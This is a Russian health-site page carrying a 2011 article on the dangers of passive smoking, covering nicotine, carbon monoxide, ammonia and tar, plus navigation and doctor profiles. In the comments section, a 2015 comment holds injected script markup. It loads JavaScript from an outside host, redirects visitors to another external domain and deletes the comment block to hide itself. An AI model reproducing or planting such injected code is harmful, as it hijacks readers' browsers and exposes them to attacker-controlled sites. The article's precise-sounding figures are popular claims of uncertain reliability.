Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  В плену пассивного курени...  >>  В плену пассивного курения
 
Обратная связь
 

В плену пассивного курения

Размер шрифта
12 мая 2011 00:00
  • google_analytics: false
  • Нравится

Знаете ли вы, что сам курильщик вдыхает лишь 15% вредного дыма? Все остальное – а это внушительные 85% – он выпускает обратно, и как раз в эту секунду продуктами горения его сигареты «наслаждаются» все вокруг. И вы, находясь в задымленном помещении, можете записать на свой счет от 1 до 4 сигарет, даже если совсем не курите. Надо ли говорить о том, что курильщику все равно, а вам расплачиваться?

Как влияет пассивное курение на организм человека

Егор Кошелев / «Здоровье-инфо»

В процессе сгорания табака образуются два потока дыма – основной и дополнительный. Основным, как мы уже сказали, затягивается сам курильщик. Дополнительный же – тот дым, который человек выдыхает. Бензпирена в нем в 3 раза больше, чем в основном, окиси углерода – в 5 раз, аммиака – аж в 30 раз! И весь этот букет получает пассивный курильщик. Ранее считалось, что табачный дым оказывает на некурящих исключительно раздражающее воздействие, и весь вред от соседства с курильщиком ограничивался описанием воспаления слизистых и сухостью во рту. Но со временем стало ясно, что люди, живущие или работающие вместе с курильщиками, подвергают свое здоровье гораздо более серьезному риску. Всему виной – вещества, которыми насыщен сигаретный дым:

1. Никотин

Первое, с чем сталкиваются окружающие. При курении никотин вдыхается в легкие, затем попадает в кровяное русло и уже через несколько секунд начинает действовать на центральную нервную систему. Итог – повышение артериального давления, тахикардия, экстрасистолия и приступы стенокардии. К тому же, со временем у человека может сформироваться никотиновая зависимость, такая же, как и у курильщика со стажем. Поэтому нередки случаи, когда после пребывания в одном помещении с курильщиками и плотной дымовой завесой некурящий человек сам закуривал.

2. Окись углерода

Угарный газ является одним из самых токсичных компонентов табачного дыма. Механизм его действия прост: вступая в связь с гемоглобином, он препятствует нормальной доставке кислорода к органам и тканям. В результате у пассивного курильщика развивается хроническое кислородное голодание. Это крайне опасно для здоровья беременной женщины, зародыша и плода.

3. Аммиак

Аммиак при сгорании табака попадает в трахею, бронхи и легкие. Он растворяется в слизистых оболочках верхних дыхательных путей, превращаясь в нашатырный спирт, который, в свою очередь, вызывает раздражение и повышенную секрецию. В итоге у пассивного курильщика возникает кашель, увеличивается чувствительность к воспалительным и аллергическим заболеваниям. Ребенок, родители которого курят, в первый год жизни в два раза чаще болеет бронхитами и пневмонией.

4. Табачные смолы

Табачные смолы проходят по легким, где частично и оседают. В год получается до 1 килограмма. В легких пассивного курильщика эта цифра, конечно, гораздо ниже, но общий вред, который он получает, не меньше. В смолах содержится опаснейший канцероген – бензпирен. Токсин может спровоцировать развитие рака легких. Кроме того, бензпирен и другие ядовитые вещества, проникающие в организм с табачным дымом, нарушают работу эндокринной системы и расстраивают менструальный цикл.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:12

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Топ-10 мифов о курении   Тяжелые последствия «легких» сигарет   Курение бьет по костям   Как отучить мужчину от курения?  
31 мая 2011Сегодня - Всемирный день отказа от курения 06 мая 2011Сигареты в Австралии станут «пугающими»
 
12 августа 2011Курящие женщины чаще умирают от инфарктов, чем мужчины 05 июля 2011Никотин только по рецепту
 

Слайдшоу

1
Какие привычки портят вам жизнь?
Как сохранить мозги в 30 лет
Что происходит в теле курящего

Тесты

1
Есть ли у вас остеопороз?
Как контролировать бронхиальную астму
Какая у вас стадия остеохондроза?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.